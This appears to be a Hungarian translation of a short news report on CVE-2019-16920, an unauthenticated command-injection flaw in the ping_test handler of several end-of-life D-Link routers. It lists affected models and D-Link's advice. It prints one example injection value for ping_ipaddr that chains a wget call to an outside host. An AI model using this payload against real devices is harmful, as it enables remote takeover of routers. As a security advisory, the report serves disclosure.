Távolról kihasználható biztonsági rés a D-Link útválasztókban

A D-Link vezeték nélküli útválasztókban azonosított veszélyes sebezhetőség (CVE-2019-16920), amely lehetővé teszi a kód távoli végrehajtását az eszköz oldalon úgy, hogy külön kérést küld a „ping_test” kezelőnek, amely hitelesítés nélkül érhető el.

Érdekesség, hogy a firmware-fejlesztők szerint a „ping_test” hívást csak hitelesítés után szabad végrehajtani, a valóságban azonban a webes felületre való bejelentkezéstől függetlenül mindenképp meghívódik. Különösen az apply_sec.cgi szkript elérésekor és az „action=ping_test” paraméter átadásakor a szkript átirányít a hitelesítési oldalra, ugyanakkor végrehajtja a ping_testhez tartozó műveletet. A kód végrehajtásához magában a ping_testben egy másik sebezhetőséget használtak, amely anélkül hívja meg a ping segédprogramot, hogy megfelelően ellenőrizte volna a tesztelésre küldött IP-cím helyességét. Például a wget segédprogram meghívásához és az „echo 1234” parancs eredményének külső gazdagépre történő átviteléhez csak adja meg a „ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://” paramétert. test.test/?$( echo 1234)".

Távolról kihasználható biztonsági rés a D-Link útválasztókban

A sebezhetőség meglétét hivatalosan a következő modellekben erősítették meg:

  • DIR-655 3.02b05 vagy régebbi firmware-rel;
  • DIR-866L 1.03b04 vagy régebbi firmware-rel;
  • DIR-1565 1.01 vagy régebbi firmware-rel;
  • DIR-652 (nincs információ a problémás firmware-verziókról)

Ezen modellek támogatási időszaka már lejárt, így a D-Link kijelentette, amely nem ad ki számukra frissítéseket a sérülékenység kiküszöbölésére, nem javasolja azok használatát, és azt tanácsolja, hogy cseréljék le őket új eszközökre. Biztonsági megoldásként a webes felülethez való hozzáférést csak megbízható IP-címekre korlátozhatja.

Később kiderült, hogy a sebezhetőség is az érinti DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 és DIR-825 modellek, amelyek frissítéseinek kiadására vonatkozó tervek még nem ismertek.

Forrás: opennet.ru

Hozzászólás